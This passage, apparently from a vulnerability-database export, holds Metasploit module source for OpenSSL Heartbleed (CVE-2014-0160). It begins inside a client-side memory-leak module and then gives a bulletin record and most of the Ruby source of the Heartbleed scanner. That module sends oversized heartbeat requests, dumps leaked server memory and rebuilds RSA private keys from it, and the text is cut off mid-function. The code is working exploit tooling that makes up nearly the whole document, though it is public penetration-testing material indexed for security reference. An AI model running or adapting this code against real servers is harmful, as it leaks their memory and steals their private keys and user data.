OpenSSL::X509::Name.new([\n [\"C\",\"US\"],\n ['ST', Rex::Text.rand_state()],\n [\"L\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"O\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n [\"CN\", Rex::Text.rand_text_alpha(rand(20) + 10).capitalize],\n ])\n\n cert.subject = subject\n cert.issuer = issuer\n cert.not_before = Time.now - (3600 * 24 * 365) + rand(3600 * 14)\n cert.not_after = Time.now + (3600 * 24 * 365) + rand(3600 * 14)\n cert.public_key = key.public_key\n ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)\n cert.extensions = [\n ef.create_extension(\"basicConstraints\",\"CA:FALSE\"),\n ef.create_extension(\"subjectKeyIdentifier\",\"hash\"),\n ef.create_extension(\"extendedKeyUsage\",\"serverAuth\"),\n ef.create_extension(\"keyUsage\",\"keyEncipherment,dataEncipherment,digitalSignature\")\n ]\n ef.issuer_certificate = cert\n cert.add_extension ef.create_extension(\"authorityKeyIdentifier\", \"keyid:always,issuer:always\")\n cert.sign(key, OpenSSL::Digest::SHA1.new)\n cert\n end\n\n # Decrypt the TLS message and return the result without the MAC\n def decrypt_data(c, data)\n return unless @state[c][:client_enc]\n\n cipher = @state[c][:client_enc]\n\n begin\n buff = cipher.update(data)\n buff << cipher.final\n\n # Trim the trailing MAC signature off the buffer\n if buff.length >= 20\n return buff[0, buff.length-20]\n end\n rescue ::OpenSSL::Cipher::CipherError => e\n print_error(\"#{@state[c][:name]} Decryption failed: #{e}\")\n end\n\n nil\n end\n\n # Calculate keys and toggle encrypted status\n def initialize_encryption_keys(c)\n tls1_calculate_crypto_keys(c)\n @state[c][:encrypted] = true\n end\n\n # Determine crypto keys for AES-128-CBC based on the master secret\n def tls1_calculate_crypto_keys(c)\n @state[c][:master] = tls1_calculate_master_key(c)\n return unless @state[c][:master]\n\n key_block = tls1_prf(\n @state[c][:master],\n \"key expansion\" + @state[c][:server_random] + @state[c][:client_random],\n (20 * 2) + (16 * 4)\n )\n\n # Extract the MAC, encryption, and IV from the keyblock\n @state[c].update({\n :client_write_mac_key => key_block.slice!(0, 20),\n :server_write_mac_key => key_block.slice!(0, 20),\n :client_write_key => key_block.slice!(0, 16),\n :server_write_key => key_block.slice!(0, 16),\n :client_iv => key_block.slice!(0, 16),\n :server_iv => key_block.slice!(0, 16),\n })\n\n client_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n client_cipher.key = @state[c][:client_write_key]\n client_cipher.iv = @state[c][:client_iv]\n client_cipher.decrypt\n client_mac = OpenSSL::HMAC.new(@state[c][:client_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n server_cipher = OpenSSL::Cipher.new('aes-128-cbc')\n server_cipher.key = @state[c][:server_write_key]\n server_cipher.iv = @state[c][:server_iv]\n server_cipher.encrypt\n server_mac = OpenSSL::HMAC.new(@state[c][:server_write_mac_key], OpenSSL::Digest.new('sha1'))\n\n @state[c].update({\n :client_enc => client_cipher,\n :client_mac => client_mac,\n :server_enc => server_cipher,\n :server_mac => server_mac\n })\n\n true\n end\n\n # Determine the master key from the premaster and client/server randoms\n def tls1_calculate_master_key(c)\n return unless (\n @state[c][:premaster] and\n @state[c][:client_random] and\n @state[c][:server_random]\n )\n tls1_prf(\n @state[c][:premaster],\n \"master secret\" + @state[c][:client_random] + @state[c][:server_random],\n 48\n )\n end\n\n # Random generator used to calculate key data for TLS 1.0/1.1\n def tls1_prf(input_secret, input_label, output_length)\n # Calculate S1 and S2 as even blocks of each half of the secret\n # string. If the blocks are uneven, then S1's last byte should\n # be duplicated by S2's first byte\n blen = (input_secret.length / 2.0).ceil\n s1 = input_secret[0, blen]\n s2_index = blen\n if input_secret.length % 2 != 0\n s2_index -= 1\n end\n s2 = input_secret[s2_index, blen]\n\n # Hash the first part with MD5\n out1 = tls1_p_hash('md5', s1, input_label, output_length).unpack(\"C*\")\n\n # Hash the second part with SHA1\n out2 = tls1_p_hash('sha1', s2, input_label, output_length).unpack(\"C*\")\n\n # XOR the results together\n [*(0..out1.length-1)].map {|i| out1[i] ^ out2[i] }.pack(\"C*\")\n end\n\n # Used by tls1_prf to generate arbitrary amounts of session key data\n def tls1_p_hash(digest, secret, label, olen)\n output = \"\"\n chunk = OpenSSL::Digest.new(digest).digest_length\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n\n ctx.update(label)\n a1 = ctx.digest\n\n loop do\n ctx = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx_tmp = OpenSSL::HMAC.new(secret, OpenSSL::Digest.new(digest))\n ctx.update(a1)\n ctx_tmp.update(a1)\n ctx.update(label)\n\n if olen > chunk\n output << ctx.digest\n a1 = ctx_tmp.digest\n olen -= chunk\n else\n a1 = ctx.digest\n output << a1[0, olen]\n break\n end\n end\n\n output\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/openssl_heartbeat_client_memory.rb"}, {"lastseen": "2019-01-11T05:55:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module implements the OpenSSL Heartbleed attack. The problem exists in the handling of heartbeat requests, where a fake length can be used to leak memory data in the response. Services that support STARTTLS may also be vulnerable. The module supports several actions, allowing for scanning, dumping of memory contents to loot, and private key recovery. The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP. The repeat command can be used to make running the SCAN or DUMP many times more powerful. As in: repeat -t 60 run; sleep 2 To run every two seconds for one minute.", "reporter": "Rapid7", "published": "2014-04-18T13:16:28", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Information Leak", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2018-11-16T18:18:28", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# TODO: Connection reuse: Only connect once and send subsequent heartbleed requests.\n# We tried it once in https://github.com/rapid7/metasploit-framework/pull/3300\n# but there were too many errors\n# TODO: Parse the rest of the server responses and return a hash with the data\n# TODO: Extract the relevant functions and include them in the framework\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n CIPHER_SUITES = [\n 0xc014, # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\n 0xc00a, # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\n 0xc022, # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA\n 0xc021, # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA\n 0x0039, # TLS_DHE_RSA_WITH_AES_256_CBC_SHA\n 0x0038, # TLS_DHE_DSS_WITH_AES_256_CBC_SHA\n 0x0088, # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA\n 0x0087, # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA\n 0xc00f, # TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA\n 0x0035, # TLS_RSA_WITH_AES_256_CBC_SHA\n 0x0084, # TLS_RSA_WITH_CAMELLIA_256_CBC_SHA\n 0xc012, # TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc008, # TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0xc01c, # TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc01b, # TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0016, # TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA\n 0x0013, # TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\n 0xc00d, # TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc003, # TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA\n 0x000a, # TLS_RSA_WITH_3DES_EDE_CBC_SHA\n 0xc013, # TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\n 0xc009, # TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\n 0xc01f, # TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA\n 0xc01e, # TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA\n 0x0033, # TLS_DHE_RSA_WITH_AES_128_CBC_SHA\n 0x0032, # TLS_DHE_DSS_WITH_AES_128_CBC_SHA\n 0x009a, # TLS_DHE_RSA_WITH_SEED_CBC_SHA\n 0x0099, # TLS_DHE_DSS_WITH_SEED_CBC_SHA\n 0x0045, # TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0x0044, # TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA\n 0xc00e, # TLS_ECDH_RSA_WITH_AES_128_CBC_SHA\n 0xc004, # TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA\n 0x002f, # TLS_RSA_WITH_AES_128_CBC_SHA\n 0x0096, # TLS_RSA_WITH_SEED_CBC_SHA\n 0x0041, # TLS_RSA_WITH_CAMELLIA_128_CBC_SHA\n 0xc011, # TLS_ECDHE_RSA_WITH_RC4_128_SHA\n 0xc007, # TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\n 0xc00c, # TLS_ECDH_RSA_WITH_RC4_128_SHA\n 0xc002, # TLS_ECDH_ECDSA_WITH_RC4_128_SHA\n 0x0005, # TLS_RSA_WITH_RC4_128_SHA\n 0x0004, # TLS_RSA_WITH_RC4_128_MD5\n 0x0015, # TLS_DHE_RSA_WITH_DES_CBC_SHA\n 0x0012, # TLS_DHE_DSS_WITH_DES_CBC_SHA\n 0x0009, # TLS_RSA_WITH_DES_CBC_SHA\n 0x0014, # TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0011, # TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA\n 0x0008, # TLS_RSA_EXPORT_WITH_DES40_CBC_SHA\n 0x0006, # TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5\n 0x0003, # TLS_RSA_EXPORT_WITH_RC4_40_MD5\n 0x00ff # Unknown\n ]\n\n SSL_RECORD_HEADER_SIZE = 0x05\n HANDSHAKE_RECORD_TYPE = 0x16\n HEARTBEAT_RECORD_TYPE = 0x18\n ALERT_RECORD_TYPE = 0x15\n HANDSHAKE_SERVER_HELLO_TYPE = 0x02\n HANDSHAKE_CERTIFICATE_TYPE = 0x0b\n HANDSHAKE_KEY_EXCHANGE_TYPE = 0x0c\n HANDSHAKE_SERVER_HELLO_DONE_TYPE = 0x0e\n\n TLS_VERSION = {\n 'SSLv3' => 0x0300,\n '1.0' => 0x0301,\n '1.1' => 0x0302,\n '1.2' => 0x0303\n }\n\n TLS_CALLBACKS = {\n 'SMTP' => :tls_smtp,\n 'IMAP' => :tls_imap,\n 'JABBER' => :tls_jabber,\n 'POP3' => :tls_pop3,\n 'FTP' => :tls_ftp,\n 'POSTGRES' => :tls_postgres\n }\n\n # See the discussion at https://github.com/rapid7/metasploit-framework/pull/3252\n SAFE_CHECK_MAX_RECORD_LENGTH = (1 << 14)\n\n # For verbose output, deduplicate repeated characters beyond this threshold\n DEDUP_REPEATED_CHARS_THRESHOLD = 400\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Information Leak',\n 'Description' => %q{\n This module implements the OpenSSL Heartbleed attack. The problem\n exists in the handling of heartbeat requests, where a fake length can\n be used to leak memory data in the response. Services that support\n STARTTLS may also be vulnerable.\n\n The module supports several actions, allowing for scanning, dumping of\n memory contents to loot, and private key recovery.\n\n The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.\n\n The repeat command can be used to make running the SCAN or DUMP many\n times more powerful. As in:\n repeat -t 60 run; sleep 2\n To run every two seconds for one minute.\n },\n 'Author' => [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'Jared Stafford <jspenguin[at]jspenguin.org>', # Original Proof of Concept. This module is based on it.\n 'FiloSottile', # PoC site and tool\n 'Christian Mehlmauer', # Msf module\n 'wvu', # Metasploit module\n 'juan vazquez', # Metasploit module\n 'Sebastiano Di Paola', # Msf module\n 'Tom Sellers', # Metasploit module\n 'jjarmoc', # Metasploit module; keydump, refactoring..\n 'Ben Buchanan', #Metasploit module\n 'herself' #Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ],\n [ 'URL', 'https://github.com/FiloSottile/Heartbleed' ],\n [ 'URL', 'https://gist.github.com/takeshixx/10107280' ],\n [ 'URL', 'http://filippo.io/Heartbleed/' ]\n ],\n 'DisclosureDate' => '2014-04-07',\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n ['SCAN', {'Description' => 'Check hosts for vulnerability'}],\n ['DUMP', {'Description' => 'Dump memory contents to loot'}],\n ['KEYS', {'Description' => 'Recover private keys from memory'}]\n ],\n 'DefaultAction' => 'SCAN',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, \"None\" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),\n OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),\n OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),\n OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),\n OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),\n OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),\n OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])\n ])\n\n register_advanced_options(\n [\n OptInt.new('HEARTBEAT_LENGTH', [true, 'Heartbeat length', 65535]),\n OptString.new('XMPPDOMAIN', [true, 'The XMPP Domain to use when Jabber is selected', 'localhost'])\n ])\n\n end\n\n #\n # Main methods\n #\n\n # Called when using check\n def check_host(ip)\n @check_only = true\n vprint_status \"Checking for Heartbleed exposure\"\n if bleed\n Exploit::CheckCode::Appears\n else\n Exploit::CheckCode::Safe\n end\n end\n\n # Main method\n def run\n if heartbeat_length > 65535 || heartbeat_length < 0\n print_error('HEARTBEAT_LENGTH should be a natural number less than 65536')\n return\n end\n\n if response_timeout < 0\n print_error('RESPONSE_TIMEOUT should be bigger than 0')\n return\n end\n\n super\n end\n\n # Main method\n def run_host(ip)\n case action.name\n # SCAN and DUMP are similar, but DUMP stores loot\n when 'SCAN', 'DUMP'\n # 'Tis but a scratch\n bleeded = ''\n\n 1.upto(leak_count) do |count|\n vprint_status(\"Leaking heartbeat response ##{count}\")\n bleeded << bleed.to_s\n end\n\n loot_and_report(bleeded)\n when 'KEYS'\n get_keys\n else\n # Shouldn't get here, since Action is Enum\n print_error(\"Unknown Action: #{action.name}\")\n end\n\n # ensure all connections are closed\n disconnect\n end\n\n #\n # DATASTORE values\n #\n\n # If this is merely a check, set to the RFC-defined\n # maximum padding length of 2^14. See:\n # https://tools.ietf.org/html/rfc6520#section-4\n # https://github.com/rapid7/metasploit-framework/pull/3252\n def heartbeat_length\n if @check_only\n SAFE_CHECK_MAX_RECORD_LENGTH\n else\n datastore['HEARTBEAT_LENGTH']\n end\n end\n\n def response_timeout\n datastore['RESPONSE_TIMEOUT']\n end\n\n def tls_version\n datastore['TLS_VERSION']\n end\n\n def dumpfilter\n datastore['DUMPFILTER']\n end\n\n def max_keytries\n datastore['MAX_KEYTRIES']\n end\n\n def xmpp_domain\n datastore['XMPPDOMAIN']\n end\n\n def status_every\n datastore['STATUS_EVERY']\n end\n\n def tls_callback\n datastore['TLS_CALLBACK']\n end\n\n def leak_count\n datastore['LEAK_COUNT']\n end\n\n #\n # TLS Callbacks\n #\n\n def tls_smtp\n # https://tools.ietf.org/html/rfc3207\n get_data\n sock.put(\"EHLO #{Rex::Text.rand_text_alpha(10)}\\r\\n\")\n res = get_data\n\n unless res && res =~ /STARTTLS/\n return nil\n end\n sock.put(\"STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_imap\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"a001 CAPABILITY\\r\\n\")\n res = get_data\n unless res && res =~ /STARTTLS/i\n return nil\n end\n sock.put(\"a002 STARTTLS\\r\\n\")\n get_data\n end\n\n def tls_postgres\n # postgresql TLS - works with all modern pgsql versions - 8.0 - 9.3\n # http://www.postgresql.org/docs/9.3/static/protocol-message-formats.html\n get_data\n # the postgres SSLRequest packet is a int32(8) followed by a int16(1234),\n # int16(5679) in network format\n psql_sslrequest = [8].pack('N')\n psql_sslrequest << [1234, 5679].pack('n*')\n sock.put(psql_sslrequest)\n res = get_data\n unless res && res =~ /S/\n return nil\n end\n res\n end\n\n def tls_pop3\n # http://tools.ietf.org/html/rfc2595\n get_data\n sock.put(\"CAPA\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/ || res !~ /STLS/\n return nil\n end\n sock.put(\"STLS\\r\\n\")\n res = get_data\n if res.nil? || res =~ /^-/\n return nil\n end\n res\n end\n\n def jabber_connect_msg(hostname)\n # http://xmpp.org/extensions/xep-0035.html\n msg = \"<stream:stream xmlns='jabber:client' \"\n msg << \"xmlns:stream='http://etherx.jabber.org/streams' \"\n msg << \"version='1.0' \"\n msg << \"to='#{hostname}'>\"\n end\n\n def tls_jabber\n sock.put(jabber_connect_msg(xmpp_domain))\n res = get_data\n if res && res.include?('host-unknown')\n jabber_host = res.match(/ from='([\\w.]*)' /)\n if jabber_host && jabber_host[1]\n disconnect\n establish_connect\n vprint_status(\"Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...\")\n sock.put(jabber_connect_msg(jabber_host[1]))\n res = get_data\n end\n end\n if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['\"]urn:ietf:params:xml:ns:xmpp-tls['\"]/\n vprint_error(\"Jabber host unknown. Please try changing the XMPPDOMAIN option.\") if res && res.include?('host-unknown')\n return nil\n end\n msg = \"<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\"\n sock.put(msg)\n res = get_data\n return nil if res.nil? || !res.include?('<proceed')\n res\n end\n\n def tls_ftp\n # http://tools.ietf.org/html/rfc4217\n res = get_data\n return nil if res.nil?\n sock.put(\"AUTH TLS\\r\\n\")\n res = get_data\n return nil if res.nil?\n if res !~ /^234/\n # res contains the error message\n vprint_error(\"FTP error: #{res.strip}\")\n return nil\n end\n res\n end\n\n #\n # Helper Methods\n #\n\n # Get data from the socket\n # this ensures the requested length is read (if available)\n def get_data(length = -1)\n to_receive = length\n data = ''\n done = false\n while done == false\n begin\n temp = sock.get_once(to_receive, response_timeout)\n rescue EOFError\n break\n end\n\n break if temp.nil?\n\n data << temp\n if length != -1\n to_receive -= temp.length\n done = true if to_receive <= 0\n end\n end\n\n data\n end\n\n def to_hex_string(data)\n data.each_byte.map { |b| sprintf('%02X ', b) }.join.strip\n end\n\n # establishes a connect and parses the server response\n def establish_connect\n connect\n\n unless tls_callback == 'None'\n vprint_status(\"Trying to start SSL via #{tls_callback}\")\n res = self.send(TLS_CALLBACKS[tls_callback])\n if res.nil?\n vprint_error(\"STARTTLS failed...\")\n return nil\n end\n end\n\n vprint_status(\"Sending Client Hello...\")\n sock.put(client_hello)\n\n server_resp = get_server_hello\n\n if server_resp.nil?\n vprint_error(\"Server Hello Not Found\")\n return nil\n end\n\n server_resp\n end\n\n # Generates a heartbeat request\n def heartbeat_request(length)\n payload = \"\\x01\" # Heartbeat Message Type: Request (1)\n payload << [length].pack('n') # Payload Length: 65535\n\n ssl_record(HEARTBEAT_RECORD_TYPE, payload)\n end\n\n # Generates, sends and receives a heartbeat message\n def bleed\n connect_result = establish_connect\n return if connect_result.nil?\n\n vprint_status(\"Sending Heartbeat...\")\n sock.put(heartbeat_request(heartbeat_length))\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n if hdr.nil? || hdr.empty?\n vprint_error(\"No Heartbeat response...\")\n disconnect\n return\n end\n\n unpacked = hdr.unpack('Cnn')\n type = unpacked[0]\n version = unpacked[1] # must match the type from client_hello\n len = unpacked[2]\n\n # try to get the TLS error\n if type == ALERT_RECORD_TYPE\n res = get_data(len)\n alert_unp = res.unpack('CC')\n alert_level = alert_unp[0]\n alert_desc = alert_unp[1]\n\n # http://tools.ietf.org/html/rfc5246#section-7.2\n case alert_desc\n when 0x46\n msg = 'Protocol error. Looks like the chosen protocol is not supported.'\n else\n msg = 'Unknown error'\n end\n vprint_error(\"#{msg}\")\n disconnect\n return\n end\n\n unless type == HEARTBEAT_RECORD_TYPE && version == TLS_VERSION[tls_version]\n vprint_error(\"Unexpected Heartbeat response header (#{to_hex_string(hdr)})\")\n disconnect\n return\n end\n\n heartbeat_data = get_data(heartbeat_length)\n vprint_status(\"Heartbeat response, #{heartbeat_data.length} bytes\")\n disconnect\n heartbeat_data\n end\n\n # Stores received data\n def loot_and_report(heartbeat_data)\n if heartbeat_data.to_s.empty?\n vprint_error(\"Looks like there isn't leaked information...\")\n return\n end\n\n print_good(\"Heartbeat response with leak, #{heartbeat_data.length} bytes\")\n report_vuln({\n :host => rhost,\n :port => rport,\n :name => self.name,\n :refs => self.references,\n :info => \"Module #{self.fullname} successfully leaked info\"\n })\n\n if action.name == 'DUMP' # Check mode, dump if requested.\n pattern = dumpfilter\n if pattern\n match_data = heartbeat_data.scan(pattern).join\n else\n match_data = heartbeat_data\n end\n path = store_loot(\n 'openssl.heartbleed.server',\n 'application/octet-stream',\n rhost,\n match_data,\n nil,\n 'OpenSSL Heartbleed server memory'\n )\n print_good(\"Heartbeat data stored in #{path}\")\n end\n\n # Convert non-printable characters to periods\n printable_data = heartbeat_data.gsub(/[^[:print:]]/, '.')\n\n # Keep this many duplicates as padding around the deduplication message\n duplicate_pad = (DEDUP_REPEATED_CHARS_THRESHOLD / 3).round\n\n # Remove duplicate characters\n abbreviated_data = printable_data.gsub(/(.)\\1{#{(DEDUP_REPEATED_CHARS_THRESHOLD - 1)},}/) do |s|\n s[0, duplicate_pad] +\n ' repeated ' + (s.length - (2 * duplicate_pad)).to_s + ' times ' +\n s[-duplicate_pad, duplicate_pad]\n end\n\n # Show abbreviated data\n vprint_status(\"Printable info leaked:\\n#{abbreviated_data}\")\n end\n\n #\n # Keydumping helper methods\n #\n\n # Tries to retreive the private key\n def get_keys\n connect_result = establish_connect\n disconnect\n return if connect_result.nil?\n\n print_status(\"Scanning for private keys\")\n count = 0\n\n print_status(\"Getting public key constants...\")\n n, e = get_ne\n\n if n.nil? || e.nil?\n print_error(\"Failed to get public key, aborting.\")\n end\n\n vprint_status(\"n: #{n}\")\n vprint_status(\"e: #{e}\")\n print_status(\"#{Time.now.getutc} - Starting.\")\n\n max_keytries.times {\n # Loop up to MAX_KEYTRIES times, looking for keys\n if count % status_every == 0\n print_status(\"#{Time.now.getutc} - Attempt #{count}...\")\n end\n\n bleedresult = bleed\n return unless bleedresult\n\n p, q = get_factors(bleedresult, n) # Try to find factors in mem\n\n unless p.nil? || q.nil?\n key = key_from_pqe(p, q, e)\n print_good(\"#{Time.now.getutc} - Got the private key\")\n\n print_status(key.export)\n path = store_loot(\n 'openssl.heartbleed.server',\n 'text/plain',\n rhost,\n key.export,\n nil,\n 'OpenSSL Heartbleed Private Key'\n )\n print_status(\"Private key stored in #{path}\")\n return\n end\n count += 1\n }\n print_error(\"Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.\")\n end\n\n # Returns the N and E params from the public server certificate\n def get_ne\n unless @cert\n print_error(\"No certificate found\")\n return\n end\n\n return @cert.public_key.params['n'], @cert.public_key.params['e']\n end\n\n # Tries to find pieces of the private key in the provided data\n def get_factors(data, n)\n # Walk through data looking for factors of n\n psize = n.num_bits / 8 / 2\n return if data.nil?\n\n (0..(data.length-psize)).each{ |x|\n # Try each offset of suitable length\n can = OpenSSL::BN.new(data[x,psize].reverse.bytes.inject {|a,b| (a << 8) + b }.to_s)\n if can > 1 && can % 2 != 0 && can.num_bytes == psize\n # Only try candidates that have a chance...\n q, rem = n / can\n if rem == 0 && can != n\n vprint_good(\"Found factor at offset #{x.to_s(16)}\")\n p = can\n return p, q\n end\n end\n }\n return nil, nil\n end\n\n # Generates the private key from the P, Q and E values\n def key_from_pqe(p, q, e)\n # Returns an RSA Private Key from Factors\n key = OpenSSL::PKey::RSA.new()\n key.set_factors(p, q)\n\n n = key.p * key.q\n phi = (key.p - 1) * (key.q - 1 )\n d = OpenSSL::BN.new(e).mod_inverse(phi)\n\n key.set_key(n, e, d)\n\n dmp1 = key.d % (key.p - 1)\n dmq1 = key.d % (key.q - 1)\n iqmp = key.q.mod_inverse(key.p)\n\n key.set_crt_params(dmp1, dmq1, iqmp)\n\n return key\n end\n\n #\n # SSL/TLS packet methods\n #\n\n # Creates and returns a new SSL record with the provided data\n def ssl_record(type, data)\n record = [type, TLS_VERSION[tls_version], data.length].pack('Cnn')\n record << data\n end\n\n # generates a CLIENT_HELLO ssl/tls packet\n def client_hello\n # Use current day for TLS time\n time_temp = Time.now\n time_epoch = Time.mktime(time_temp.year, time_temp.month, time_temp.day, 0, 0).to_i\n\n hello_data = [TLS_VERSION[tls_version]].pack('n') # Version TLS\n hello_data << [time_epoch].pack('N') # Time in epoch format\n hello_data << Rex::Text.rand_text(28) # Random\n hello_data << \"\\x00\" # Session ID length\n hello_data << [CIPHER_SUITES.length * 2].pack('n') # Cipher Suites length (102)\n hello_data << CIPHER_SUITES.pack('n*') # Cipher Suites\n hello_data << \"\\x01\" # Compression methods length (1)\n hello_data << \"\\x00\" # Compression methods: null\n\n hello_data_extensions = \"\\x00\\x0f\" # Extension type (Heartbeat)\n hello_data_extensions << \"\\x00\\x01\" # Extension length\n hello_data_extensions << \"\\x01\" # Extension data\n\n hello_data << [hello_data_extensions.length].pack('n')\n hello_data << hello_data_extensions\n\n data = \"\\x01\\x00\" # Handshake Type: Client Hello (1)\n data << [hello_data.length].pack('n') # Length\n data << hello_data\n\n ssl_record(HANDSHAKE_RECORD_TYPE, data)\n end\n\n def get_ssl_record\n hdr = get_data(SSL_RECORD_HEADER_SIZE)\n\n unless hdr\n vprint_error(\"No SSL record header received after #{response_timeout} seconds...\")\n return nil\n end\n\n len = hdr.unpack('Cnn')[2]\n data = get_data(len) unless len.nil?\n\n unless data\n vprint_error(\"No SSL record contents received after #{response_timeout} seconds...\")\n return nil\n end\n\n hdr << data\n end\n\n # Get and parse server hello response until we hit Server Hello Done or timeout\n def get_server_hello\n server_done = nil\n ssl_record_counter = 0\n\n remaining_data = get_ssl_record\n\n while remaining_data && remaining_data.length > 0\n ssl_record_counter += 1\n ssl_unpacked = remaining_data.unpack('CH4n')\n return nil if ssl_unpacked.nil? or ssl_unpacked.length < 3\n ssl_type = ssl_unpacked[0]\n ssl_version = ssl_unpacked[1]\n ssl_len = ssl_unpacked[2]\n vprint_status(\"SSL record ##{ssl_record_counter}:\")\n vprint_status(\"\\tType: #{ssl_type}\")\n vprint_status(\"\\tVersion: 0x#{ssl_version}\")\n vprint_status(\"\\tLength: #{ssl_len}\")\n if ssl_type != HANDSHAKE_RECORD_TYPE\n vprint_status(\"\\tWrong Record Type! (#{ssl_type})\")\n else\n ssl_data = remaining_data[5, ssl_len]\n handshakes = parse_handshakes(ssl_data)\n\n # Stop once we receive a SERVER_HELLO_DONE\n if handshakes && handshakes.length > 0 && handshakes[-1][:type] == HANDSHAKE_SERVER_HELLO_DONE_TYPE\n server_done = true\n break\n end\n\n end\n\n remaining_data = get_ssl_record\n end\n\n server_done\n end\n\n # Parse Handshake data returned from servers\n def parse_handshakes(data)\n # Can contain multiple handshakes\n remaining_data = data\n handshakes = []\n handshake_count = 0\n while remaining_data && remaining_data.length > 0\n hs_unpacked = remaining_data.unpack('CCn')\n next if hs_unpacked.nil? or hs_unpacked.length < 3\n hs_type = hs_unpacked[0]\n hs_len_pad = hs_unpacked[1]\n hs_len = hs_unpacked[2]\n hs_data = remaining_data[4, hs_len]\n handshake_count += 1\n vprint_status(\"\\tHandshake ##{handshake_count}:\")\n vprint_status(\"\\t\\tLength: #{hs_len}\")\n\n handshake_parsed = nil\n case hs_type\n when HANDSHAKE_SERVER_HELLO_TYPE\n vprint_status(\"\\t\\tType: Server Hello (#{hs_type})\")\n handshake_parsed = parse_server_hello(hs_data)\n when HANDSHAKE_CERTIFICATE_TYPE\n vprint_status(\"\\t\\tType: Certificate Data (#{hs_type})\")\n handshake_parsed = parse_certificate_data(hs_data)\n when HANDSHAKE_KEY_EXCHANGE_TYPE\n vprint_status(\"\\t\\tType: Server Key Exchange (#{hs_type})\")\n # handshake_parsed = parse_server_key_exchange(hs_data)\n when 